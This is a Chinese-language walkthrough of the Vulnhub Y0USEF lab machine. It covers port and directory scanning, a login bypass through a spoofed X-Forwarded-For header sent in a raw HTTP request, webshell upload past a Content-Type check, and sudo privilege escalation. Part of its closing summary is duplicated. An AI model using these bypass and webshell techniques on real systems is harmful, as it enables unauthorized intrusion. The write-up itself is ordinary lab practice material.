聲明
好好學習,天天向上
搭建
Y0USEF: 1,vulnhub官網下載下傳完鏡像後,最開始搭建時,導入vmware屢屢出錯,改了ovftool,以及各種配置還是無法導入,最後下載下傳Oracle VM Virtrualbox,導入到這個裡面,網絡設定成橋接網卡,可以正常使用
滲透
存活掃描
nmap -sP 192.168.31.1/24
端口掃描
nmap -T4 -A 192.168.31.232 -p 1-65535 -oN nmap.A
發現開啟22和80,看看80的http
通路80,啥都沒有
http://192.168.31.232
dirsearch掃描以下目錄吧
python3 dirsearch.py -u "http://192.168.31.232" -e *
看到幾個有價值的目錄
依次試試,都沒有正常顯示
隻能進行一波源碼審計了,需要通過POST,x-forwarded-for: 127.0.0.1,傳遞username和password參數,并且使用者名和密碼都是admin,
試一下,通過BP構造,我這裡就是通路adminstration後,直接抓包,改了方法為POST,加了x-forwarded-for: 127.0.0.1,加了username和password參數,剩下都沒變,cookie也不要動
POST /adminstration/ HTTP/1.1
Host: 192.168.31.232
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
x-forwarded-for: 127.0.0.1
Cookie: PHPSESSID=2s2560163ks1k53cj1aoni0b03
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=admin&password=admin
這個重放是測試,可以這麼傳參,我們用的時候,就是在Proxy裡面加上參數直接轉發,要不然跳轉不了
轉發請求後,看到上傳頁面
上傳檔案拿shell,這裡需要一個小小的繞過,隻需要content-type是圖檔屬性就行,是以我修改Content-Type: image/png
上傳成功
掃描到adminstration下的目錄,發現upload目錄,一層一層掃描,發現了我的冰蠍馬
通路
http://192.168.31.232/adminstration/upload/files/16092954691.php
冰蠍連接配接,靜候一會,等太久了,直接用一句話吧
拿到第一個flag,base64解密後,得到使用者
yousef
yousef123
ssh連接配接
現在就是提權,用最簡單的,sudo提權
sudo su
成功提權,拿到flag
You’ve got the root Congratulations any feedback content me twitter @y0usef_11
總結
端口掃描,發現22和80,優先從80攻擊
攻擊web,就是要拿到背景的權限,因為背景權限才最有可能上傳木馬,拿到一般的shell權限
攻擊web就要知道背景的目錄,就需要對目錄進行掃描,想辦法正常登入,爆破也好,繞過也好,這裡相當于“作弊”,用的代碼審計
拿下web權限後,就要想方設法上傳木馬拿下shell,各種繞過檢測
拿下shell後,就需要維持權限,通過反連或者找一找機器上有沒有使用者名和密碼資訊,這個shell的權限一般都是www的
提權,最簡單的sudo提權,輸入自己的密碼,就可以提到root
描,想辦法正常登入,爆破也好,繞過也好,這裡相當于“作弊”,用的代碼審計
拿下web權限後,就要想方設法上傳木馬拿下shell,各種繞過檢測
拿下shell後,就需要維持權限,通過反連或者找一找機器上有沒有使用者名和密碼資訊,這個shell的權限一般都是www的
提權,最簡單的sudo提權,輸入自己的密碼,就可以提到root